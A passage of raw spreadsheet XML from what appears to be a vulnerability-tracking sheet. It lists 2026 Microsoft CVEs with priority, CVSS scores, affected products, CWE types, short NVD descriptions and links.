r="187"><c r="A187" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C187" s="5" t="inlineStr"><is><t>CVE-2026-69860</t></is></c><c r="D187" s="5" t="n"><v>8.800000000000001</v></c><c r="E187" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F187" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G187" s="5" t="inlineStr" /><c r="H187" s="5" t="n"><v>0.008</v></c><c r="I187" s="5" t="inlineStr" /><c r="J187" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K18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87" s="5" t="inlineStr" /><c r="M187" s="5" t="inlineStr" /><c r="N187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q187" s="5" t="inlineStr" /><c r="R187" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S187" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t></is></c></row><row r="188"><c r="A188" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C188" s="5" t="inlineStr"><is><t>CVE-2026-70203</t></is></c><c r="D188" s="5" t="n"><v>8.800000000000001</v></c><c r="E188" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F188" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G188" s="5" t="inlineStr" /><c r="H188" s="5" t="n"><v>0.008</v></c><c r="I188" s="5" t="inlineStr" /><c r="J188" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K18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88" s="5" t="inlineStr" /><c r="M188" s="5" t="inlineStr" /><c r="N188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P188" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q188" s="5" t="inlineStr" /><c r="R188" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S188" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t></is></c></row><row r="189"><c r="A189" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C189" s="5" t="inlineStr"><is><t>CVE-2026-70351</t></is></c><c r="D189" s="5" t="n"><v>8.800000000000001</v></c><c r="E189" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F189" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G189" s="5" t="inlineStr" /><c r="H189" s="5" t="n"><v>0.008</v></c><c r="I189" s="5" t="inlineStr" /><c r="J189" s="5" t="inlineStr" /><c r="K189" s="5" t="inlineStr" /><c r="L189" s="5" t="inlineStr" /><c r="M189" s="5" t="inlineStr" /><c r="N189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P189" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q189" s="5" t="inlineStr" /><c r="R189" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S189" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t></is></c></row><row r="190"><c r="A190" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C190" s="5" t="inlineStr"><is><t>CVE-2026-70586</t></is></c><c r="D190" s="5" t="n"><v>8.800000000000001</v></c><c r="E190" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F190" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G190" s="5" t="inlineStr" /><c r="H190" s="5" t="n"><v>0.008</v></c><c r="I190" s="5" t="inlineStr" /><c r="J190" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K19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90" s="5" t="inlineStr" /><c r="M190" s="5" t="inlineStr" /><c r="N190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P190" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q190" s="5" t="inlineStr" /><c r="R190" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S190" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t></is></c></row><row r="191"><c r="A191" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C191" s="5" t="inlineStr"><is><t>CVE-2026-71328</t></is></c><c r="D191" s="5" t="n"><v>8.800000000000001</v></c><c r="E191" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F191" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G191" s="5" t="inlineStr" /><c r="H191" s="5" t="n"><v>0.006</v></c><c r="I191" s="5" t="inlineStr" /><c r="J191" s="5" t="inlineStr" /><c r="K191" s="5" t="inlineStr"><is><t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t></is></c><c r="L191" s="5" t="inlineStr" /><c r="M191" s="5" t="inlineStr" /><c r="N191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P191" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q191" s="5" t="inlineStr" /><c r="R191" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S191" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t></is></c></row><row r="192"><c r="A192" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C192" s="5" t="inlineStr"><is><t>CVE-2026-71336</t></is></c><c r="D192" s="5" t="n"><v>8.800000000000001</v></c><c r="E192" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F192" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G192" s="5" t="inlineStr" /><c r="H192" s="5" t="n"><v>0.008999999999999999</v></c><c r="I192" s="5" t="inlineStr" /><c r="J192" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K192" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L192" s="5" t="inlineStr" /><c r="M192" s="5" t="inlineStr" /><c r="N192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P192" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q192" s="5" t="inlineStr" /><c r="R192" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S192" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t></is></c><c r="T192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t></is></c></row><row r="193"><c r="A193" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C193" s="5" t="inlineStr"><is><t>CVE-2026-71352</t></is></c><c r="D193" s="5" t="n"><v>8.800000000000001</v></c><c r="E193" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F193" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G193" s="5" t="inlineStr" /><c r="H193" s="5" t="n"><v>0.007</v></c><c r="I193" s="5" t="inlineStr" /><c r="J193" s="5" t="inlineStr" /><c r="K193" s="5" t="inlineStr" /><c r="L193" s="5" t="inlineStr" /><c r="M193" s="5" t="inlineStr" /><c r="N193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P193" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q193" s="5" t="inlineStr" /><c r="R193" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S193" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t></is></c><c r="T193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t></is></c></row><row r="194"><c r="A194" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C194" s="5" t="inlineStr"><is><t>CVE-2026-72933</t></is></c><c r="D194" s="5" t="n"><v>8.800000000000001</v></c><c r="E194" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F194" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G194" s="5" t="inlineStr" /><c r="H194" s="5" t="n"><v>0.008</v></c><c r="I194" s="5" t="inlineStr" /><c r="J194" s="5" t="inlineStr" /><c r="K194" s="5" t="inlineStr" /><c r="L194" s="5" t="inlineStr" /><c r="M194" s="5" t="inlineStr" /><c r="N194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P194" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q194" s="5" t="inlineStr" /><c r="R194" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S194" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t></is></c></row><row r="195"><c r="A195" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C195" s="5" t="inlineStr"><is><t>CVE-2026-72940</t></is></c><c r="D195" s="5" t="n"><v>8.800000000000001</v></c><c r="E195" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F195" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G195" s="5" t="inlineStr" /><c r="H195" s="5" t="n"><v>0.008</v></c><c r="I195" s="5" t="inlineStr" /><c r="J195" s="5" t="inlineStr" /><c r="K195" s="5" t="inlineStr" /><c r="L195" s="5" t="inlineStr" /><c r="M195" s="5" t="inlineStr" /><c r="N195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P195" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q195" s="5" t="inlineStr" /><c r="R195" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S195" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t></is></c></row><row r="196"><c r="A196" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C196" s="5" t="inlineStr"><is><t>CVE-2026-72950</t></is></c><c r="D196" s="5" t="n"><v>8.800000000000001</v></c><c r="E196" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F196" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G196" s="5" t="inlineStr" /><c r="H196" s="5" t="n"><v>0.008999999999999999</v></c><c r="I196" s="5" t="inlineStr" /><c r="J196" s="5" t="inlineStr" /><c r="K196" s="5" t="inlineStr" /><c r="L196" s="5" t="inlineStr" /><c r="M196" s="5" t="inlineStr" /><c r="N196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P196" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q196" s="5" t="inlineStr" /><c r="R196" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S196" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t></is></c></row><row r="197"><c r="A197" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C197" s="5" t="inlineStr"><is><t>CVE-2026-72959</t></is></c><c r="D197" s="5" t="n"><v>8.800000000000001</v></c><c r="E197" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F197" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G197" s="5" t="inlineStr" /><c r="H197" s="5" t="n"><v>0.008999999999999999</v></c><c r="I197" s="5" t="inlineStr" /><c r="J197" s="5" t="inlineStr" /><c r="K197" s="5" t="inlineStr" /><c r="L197" s="5" t="inlineStr" /><c r="M197" s="5" t="inlineStr" /><c r="N197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P197" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q197" s="5" t="inlineStr" /><c r="R197" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S197" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t></is></c></row><row r="198"><c r="A198" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C198" s="5" t="inlineStr"><is><t>CVE-2026-72960</t></is></c><c r="D198" s="5" t="n"><v>8.800000000000001</v></c><c r="E198" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F198" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G198" s="5" t="inlineStr" /><c r="H198" s="5" t="n"><v>0.008</v></c><c r="I198" s="5" t="inlineStr" /><c r="J198" s="5" t="inlineStr" /><c r="K198" s="5" t="inlineStr" /><c r="L198" s="5" t="inlineStr" /><c r="M198" s="5" t="inlineStr" /><c r="N198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P198" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q198" s="5" t="inlineStr" /><c r="R198" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S198" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t></is></c></row><row r="199"><c r="A199" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C199" s="5" t="inlineStr"><is><t>CVE-2026-72972</t></is></c><c r="D199" s="5" t="n"><v>8.800000000000001</v></c><c r="E199" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F199" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G199" s="5" t="inlineStr" /><c r="H199" s="5" t="n"><v>0.008</v></c><c r="I199" s="5" t="inlineStr" /><c r="J199" s="5" t="inlineStr" /><c r="K199" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L199" s="5" t="inlineStr" /><c r="M199" s="5" t="inlineStr" /><c r="N199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P199" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q199" s="5" t="inlineStr" /><c r="R199" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S199" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t></is></c></row><row r="200"><c r="A200" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C200" s="5" t="inlineStr"><is><t>CVE-2026-72973</t></is></c><c r="D200" s="5" t="n"><v>8.800000000000001</v></c><c r="E200" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G200" s="5" t="inlineStr" /><c r="H200" s="5" t="n"><v>0.008</v></c><c r="I200" s="5" t="inlineStr" /><c r="J200" s="5" t="inlineStr" /><c r="K200" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L200" s="5" t="inlineStr" /><c r="M200" s="5" t="inlineStr" /><c r="N200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P200" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q200" s="5" t="inlineStr" /><c r="R200" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S200" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t></is></c></row><row r="201"><c r="A201" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C201" s="5" t="inlineStr"><is><t>CVE-2026-72986</t></is></c><c r="D201" s="5" t="n"><v>8.800000000000001</v></c><c r="E201" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F201" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G201" s="5" t="inlineStr" /><c r="H201" s="5" t="n"><v>0.008</v></c><c r="I201" s="5" t="inlineStr" /><c r="J201" s="5" t="inlineStr" /><c r="K201" s="5" t="inlineStr" /><c r="L201" s="5" t="inlineStr" /><c r="M201" s="5" t="inlineStr" /><c r="N201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P201" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q201" s="5" t="inlineStr" /><c r="R201" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S201" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t></is></c></row><row r="202"><c r="A202" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C202" s="5" t="inlineStr"><is><t>CVE-2026-73006</t></is></c><c r="D202" s="5" t="n"><v>8.800000000000001</v></c><c r="E202" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F202" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G202" s="5" t="inlineStr" /><c r="H202" s="5" t="n"><v>0.008</v></c><c r="I202" s="5" t="inlineStr" /><c r="J202" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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202" s="5" t="inlineStr" /><c r="M202" s="5" t="inlineStr" /><c r="N202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P202" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q202" s="5" t="inlineStr" /><c r="R202" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S202" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t></is></c></row><row r="203"><c r="A203" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C203" s="5" t="inlineStr"><is><t>CVE-2026-73012</t></is></c><c r="D203" s="5" t="n"><v>8.800000000000001</v></c><c r="E203" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F203" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G203" s="5" t="inlineStr" /><c r="H203" s="5" t="n"><v>0.006</v></c><c r="I203" s="5" t="inlineStr" /><c r="J203" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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3" s="5" t="inlineStr" /><c r="M203" s="5" t="inlineStr" /><c r="N203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q203" s="5" t="inlineStr" /><c r="R203" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S203" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t></is></c></row><row r="204"><c r="A204" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C204" s="5" t="inlineStr"><is><t>CVE-2026-73013</t></is></c><c r="D204" s="5" t="n"><v>8.800000000000001</v></c><c r="E204" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G204" s="5" t="inlineStr" /><c r="H204" s="5" t="n"><v>0.006</v></c><c r="I204" s="5" t="inlineStr" /><c r="J204" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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4" s="5" t="inlineStr" /><c r="M204" s="5" t="inlineStr" /><c r="N204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P204" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q204" s="5" t="inlineStr" /><c r="R204" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S204" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t></is></c></row><row r="205"><c r="A205" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C205" s="5" t="inlineStr"><is><t>CVE-2026-73016</t></is></c><c r="D205" s="5" t="n"><v>8.800000000000001</v></c><c r="E205" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G205" s="5" t="inlineStr" /><c r="H205" s="5" t="n"><v>0.006</v></c><c r="I205" s="5" t="inlineStr" /><c r="J205" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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5" s="5" t="inlineStr" /><c r="M205" s="5" t="inlineStr" /><c r="N205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P205" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q205" s="5" t="inlineStr" /><c r="R205" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S205" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t></is></c></row><row r="206"><c r="A206" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C206" s="5" t="inlineStr"><is><t>CVE-2026-73018</t></is></c><c r="D206" s="5" t="n"><v>8.800000000000001</v></c><c r="E206" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G206" s="5" t="inlineStr" /><c r="H206" s="5" t="n"><v>0.008</v></c><c r="I206" s="5" t="inlineStr" /><c r="J206" s="5" t="inlineStr" /><c r="K206" s="5" t="inlineStr" /><c r="L206" s="5" t="inlineStr" /><c r="M206" s="5" t="inlineStr" /><c r="N206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P206" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q206" s="5" t="inlineStr" /><c r="R206" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S206" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t></is></c></row><row r="207"><c r="A207" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C207" s="5" t="inlineStr"><is><t>CVE-2026-73023</t></is></c><c r="D207" s="5" t="n"><v>8.800000000000001</v></c><c r="E207" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G207" s="5" t="inlineStr" /><c r="H207" s="5" t="n"><v>0.006</v></c><c r="I207" s="5" t="inlineStr" /><c r="J207" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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7" s="5" t="inlineStr" /><c r="M207" s="5" t="inlineStr" /><c r="N207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P207" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q207" s="5" t="inlineStr" /><c r="R207" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S207" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t></is></c></row><row r="208"><c r="A208" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C208" s="5" t="inlineStr"><is><t>CVE-2026-73028</t></is></c><c r="D208" s="5" t="n"><v>8.800000000000001</v></c><c r="E208" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F208" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G208" s="5" t="inlineStr" /><c r="H208" s="5" t="n"><v>0.005</v></c><c r="I208" s="5" t="inlineStr" /><c r="J208" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K208" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L208" s="5" t="inlineStr" /><c r="M208" s="5" t="inlineStr" /><c r="N208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P208" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q208" s="5" t="inlineStr" /><c r="R208" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S208" s="5" t="inlineStr"><is><t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t></is></c></row><row r="209"><c r="A209" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C209" s="5" t="inlineStr"><is><t>CVE-2026-77105</t></is></c><c r="D209" s="5" t="n"><v>8.800000000000001</v></c><c r="E209" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G209" s="5" t="inlineStr" /><c 